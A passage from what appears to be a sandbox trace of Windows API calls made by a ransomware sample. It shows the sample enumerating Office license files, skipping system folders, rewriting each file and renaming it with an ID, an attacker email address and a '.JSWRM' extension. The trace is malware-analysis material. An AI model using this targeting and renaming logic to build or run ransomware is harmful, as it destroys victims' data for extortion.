Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0103.386] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0103.400] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.400] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0103.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.400] CloseHandle (hObject=0x45c) returned 1 [0103.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0103.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0103.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0103.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0103.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0103.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0103.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.401] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0103.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0103.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.403] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3fdcd93, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3fdcd93, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe40c1be1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4df2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail-ul-phn.xrm-ms", cAlternateFileName="HO7BFB~1.XRM")) returned 1 [0103.413] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0103.414] lstrcmpiW (lpString1="HomeBusinessR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0103.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0103.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0103.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0103.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0103.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0103.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0103.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0103.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0103.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.424] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19954) returned 1 [0103.424] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0103.424] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0103.474] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.474] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0103.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.474] CloseHandle (hObject=0x45c) returned 1 [0103.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0103.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0103.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0103.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0103.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0103.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.475] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0103.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0103.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.477] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3f1e1f4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3f1e1f4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe40291d7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail2-pl.xrm-ms", cAlternateFileName="HO5279~1.XRM")) returned 1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2=".") returned 1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="..") returned 1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="...") returned 1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="windows") returned -1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="recovery") returned -1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.477] lstrcmpiW (lpString1="HomeBusinessR_Retail2-pl.xrm-ms", lpString2="msocache") returned -1 [0103.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0103.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241178, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0103.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241100, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0103.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0103.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0103.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.478] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10659) returned 1 [0103.478] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0103.478] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0103.480] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.480] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0103.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.481] CloseHandle (hObject=0x45c) returned 1 [0103.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0103.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0103.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0103.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0103.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0103.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0103.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.481] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0103.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0103.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0103.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0103.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0103.482] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe40291d7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe40291d7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe40e7dfb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x564c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail2-ppd.xrm-ms", cAlternateFileName="HO589B~1.XRM")) returned 1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2=".") returned 1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="..") returned 1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="...") returned 1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="windows") returned -1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.482] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0103.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0103.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0103.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ppd.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0103.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0103.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, 